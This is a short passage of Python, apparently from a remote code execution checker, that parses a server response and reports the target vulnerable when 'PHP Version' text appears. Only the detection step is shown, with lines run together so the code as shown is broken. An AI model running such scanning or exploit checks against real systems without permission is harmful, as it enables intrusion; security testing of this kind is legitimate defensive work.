headers=headers, timeout=3, verify=False, allow_redirects=False)soup = BeautifulSoup(response.text,"lxml")if'PHP Version'instr(soup.text):print('[+] Remote code execution vulnerability exists at the target address')print('